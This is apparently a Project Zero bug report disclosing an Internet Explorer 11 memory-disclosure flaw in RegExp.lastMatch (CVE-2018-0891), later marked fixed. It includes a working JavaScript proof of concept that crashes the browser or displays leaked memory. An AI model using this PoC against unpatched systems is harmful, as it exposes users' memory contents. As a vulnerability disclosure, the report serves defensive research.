New issue
Advanced search Search tips

Issue 1461 link

Starred by 2 users

Issue metadata

Status: Fixed
Owner:
Closed: Mar 2018
Cc:



Sign in to add a comment

IE11: RegExp.lastMatch memory disclosure

Project Member Reported by ifratric@google.com, Dec 6 2017

Issue description

There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Window 7 64-bit with the latest patches applied.

PoC:

=========================================

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

</script>

=========================================

Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed (see the attached screenshot).


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.

 
Project Member

Comment 1 by ifratric@google.com, Dec 6 2017

leak3.png
31.3 KB View Download
Project Member

Comment 2 by ifratric@google.com, Feb 20 2018

Labels: CVE-2018-0891
Project Member

Comment 3 by ifratric@google.com, Mar 1 2018

Labels: Deadline-Grace
Project Member

Comment 4 by ifratric@google.com, Mar 20 2018

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed in https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0891

Sign in to add a comment